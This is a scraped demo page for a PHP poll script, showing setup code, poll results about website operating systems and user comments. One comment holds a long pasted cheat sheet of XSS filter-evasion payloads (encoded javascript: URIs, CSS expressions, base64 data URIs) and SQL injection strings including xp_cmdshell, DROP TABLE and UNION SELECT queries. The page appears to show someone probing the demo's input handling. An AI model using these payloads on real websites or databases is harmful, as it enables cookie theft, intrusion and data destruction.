Demo 1 Demo 2 Demo 3 Demo 4 Demo 5

<?php
/* Include this before your html code */
include_once "./poll_cookie.php";
?>
<?php

 /* path */
$poll_path = dirname(__FILE__);

require_once $poll_path."/include/config.inc.php";
require_once $poll_path."/include/$POLLDB[class]";
require_once $poll_path."/include/class_poll.php";
require_once $poll_path."/include/class_pollcomment.php";
$CLASS["db"] = new polldb_sql;
$CLASS["db"]->connect();

$php_poll = new pollcomment();

/* poll */
$php_poll->set_template_set("graphic");
echo $php_poll->view_poll_result(1);


/* poll comments */
$php_poll->set_template("poll_comment");
$php_poll->set_comments_per_page(3);
$php_poll->set_date_format("d/m/Y H:i");
$php_poll->data_order_by("time","desc");
echo $php_poll->view_poll_comments(1);
echo $php_poll->get_comment_pages(1);

?>
      
Which OS is your Website running on?
Linux - 40.1%
WindowsNT - 18.5%
other - 10.9%
Unix - 10.3%
FreeBSD - 8.0%
Solaris - 6.6%
BSD - 5.7%
  Total votes: 144519
Send comment 
Yoosha Design@Yahoo.co.uk - 25/07/2008 19:57
cache3.morva.net
<script>alert(document.cookie)</scri
pt>

<IMG SRC="javascript:alert('XSS');">

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=JaVaScRiPt:alert('XSS')>

<IMG SRC=javascript:alert(&quot;XSS&quot;
)>

<IMG SRC=`javascript:alert("XSS")`>

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

<IMG SRC=javascript:alert(String.fromChar
Code(88,83,83))>

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99
;&#114;&#105;&#112;&#116;&#58;&#97;&
#108;&#101;&#114;&#116;&#40;&#39;&#8
8;&#83;&#83;&#39;&#41;>

<IMG SRC=&#0000106&#0000097&#0000118&#000
0097&#0000115&#0000099&#0000114&#000
0105&#0000112&#0000116&#0000058&#000
0097&#0000108&#0000101&#0000114&#000
0116&#0000040&#0000039&#0000088&#000
0083&#0000083&#0000039&#0000041>

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#
x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x
65&#x72&#x74&#x28&#x27&#x58&#x53&#x5
3&#x27&#x29>

<IMG SRC="jav ascript:alert('XSS');">

<IMG SRC="jav&#x09;ascript:alert('XSS');"
>

<IMG SRC="jav&#x0A;ascript:alert('XSS');"
>

<IMG SRC="jav&#x0D;ascript:alert('XSS');"
>

<IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
X
S
S
'
)
"
>
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>
";' > out

<IMG SRC=" &#14; javascript:alert('XSS');">

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=aler
t("XSS")>

<<SCRIPT>alert("XSS");//<</SCRIPT>

<IMG SRC="javascript:alert('XSS')"

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

</TITLE><SCRIPT>alert("XSS");</SCRIP
T>

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

<BODY BACKGROUND="javascript:alert('XSS')"
>

<BODY ONLOAD=alert('XSS')>

<IMG DYNSRC="javascript:alert('XSS')">

<IMG LOWSRC="javascript:alert('XSS')">

<BGSOUND SRC="javascript:alert('XSS');">

<BR SIZE="&{alert('XSS')}">

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

<XSS STYLE="behavior: url(xss.htc);">

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</ST
YLE><UL><LI>XSS

<IMG SRC='vbscript:msgbox("XSS")'>

<IMG SRC="mocha:[code]">

<IMG SRC="livescript:[code]">

?script?alert(?XSS?)?/script?

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS
');">

<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64
,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3Njcml
wdD4K">

<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XS
S');">

<IFRAME SRC="javascript:alert('XSS');"></IFR
AME>

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRA
MESET>

<TABLE BACKGROUND="javascript:alert('XSS')"
>

<TABLE><TD BACKGROUND="javascript:alert('XSS')"
>

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

<DIV STYLE="background-image:\0075\0072\0
06C\0028'\006a\0061\0076\0061\0073\0
063\0072\0069\0070\0074\003a\0061\00
6c\0065\0072\0074\0028.1027\0058.105
3\0053\0027\0029'\0029">

<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">

<DIV STYLE="width: expression(alert('XSS'));">

<STYLE>@im\port'\ja\vasc\ript:alert(
"XSS")';</STYLE>

<IMG STYLE="xss:expr/*XSS*/ession(alert('
XSS'))">

<XSS STYLE="xss:expression(alert('XSS'))"
>
exp/*<A STYLE='no\xss:noxss("*//*");
xss:&#101;x&#x2F;*XSS*//*/*/pression
(alert("XSS"))'>

<STYLE>.XSS{background-image:url("ja
vascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

<STYLE type="text/css">BODY{background:url(
"javascript:alert('XSS')")}</STYLE>

<SCRIPT>alert('XSS');</SCRIPT>

<BASE HREF="javascript:alert('XSS');//">

<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b7
6-0080c744f389><param name=url value=javascript:alert('XSS')></OBJE
CT>

<EMBED SRC="data:image/svg+xml;base64,PHN2Z
yB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bW
xucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRw
Oi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9
IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw
aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRl
eHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
<HTML xmlns:xss>

<xss:xss>XSS</xss:xss>

<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('X
SS');">]]>

</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('XSS')"&gt;</B></I></
XML>

<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

<XML SRC="xsstest.xml" ID=I></XML>

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
ns="urn:schemas-microsoft-com:time">

<?import namespace="t" implementation="#default#time2">

<t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/
SCRIPT&gt;">

<? echo('<SCR)';
echo('IPT>alert("XSS")</SCRIPT>'); ?>

<META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert(
'XSS')&lt;/SCRIPT&gt;">

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');
+ADw-/SCRIPT+AD4-

<A HREF="http://1113982867/">XSS</A>

<A HREF="http://0x42.0x0000066.0x7.0x93
/">XSS</A>

<A HREF="http://0102.0146.0007.00000223
/">XSS</A>

<A HREF="h
tt p://6&#9;6.000146.0x7.147/">XSS</A>

<
%3C
&lt
&lt;
&LT
&LT;
&#60
&#060
&#0060
&#00060
&#000060
&#0000060
&#60;
&#060;
&#0060;
&#00060;
&#000060;
&#0000060;
&#x3c
&#x03c
&#x003c
&#x0003c
&#x00003c
&#x000003c
&#x3c;
&#x03c;
&#x003c;
&#x0003c;
&#x00003c;
&#x000003c;
&#X3c
&#X03c
&#X003c
&#X0003c
&#X00003c
&#X000003c
&#X3c;
&#X03c;
&#X003c;
&#X0003c;
&#X00003c;
&#X000003c;
&#x3C
&#x03C
&#x003C
&#x0003C
&#x00003C
&#x000003C
&#x3C;
&#x03C;
&#x003C;
&#x0003C;
&#x00003C;
&#x000003C;
&#X3C
&#X03C
&#X003C
&#X0003C
&#X00003C
&#X000003C
&#X3C;
&#X03C;
&#X003C;
&#X0003C;
&#X00003C;
&#X000003C;
\x3c
\x3C
\u003c
\u003C

' OR

' or '

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or 1=1--

or 1=1--

' or 'a'='a

" or "a"="a

') or ('a'='a

") or ("a"="a

EXEC master..xp cmdshell 'dir C:\'
'x' AND 1=(SELECT COUNT(*) FROM X); --';
'x' OR full_name LIKE '%Bob%';
UNION SELECT TOP 1 X FROM XTABLE--
SELECT userid FROM logins WHERE name='Wayne' AND password='Pirate' OR 1=1
INSERT INTO Users VALUES('neo', 'trinity')
UNION ALL SELECT field FROM table WHERE 1= 1
-1 UNION SELECT field FROM table WHERE 1= 1
;DROP TABLE X
SELECT * FROM Users WHERE User='X' AND Pass='Y'
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
SELECT TOP 1 X FROM XTABLE WHERE X='ZZZ'--
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='x'--
 
almohasb webmaster@almohasb.info - 24/07/2008 16:30
host-41.232.73.174.tedata.net
aaaaaaaaaaaaaaa
 
mondke kdjf@dk.com - 24/07/2008 00:04
80-44-100-140.dynamic.dsl.as9105.com
bice comment
 
<  288 | 289 | 290 | 291 | 292 | 293 | 294 | 295 | 296 | 297 |  >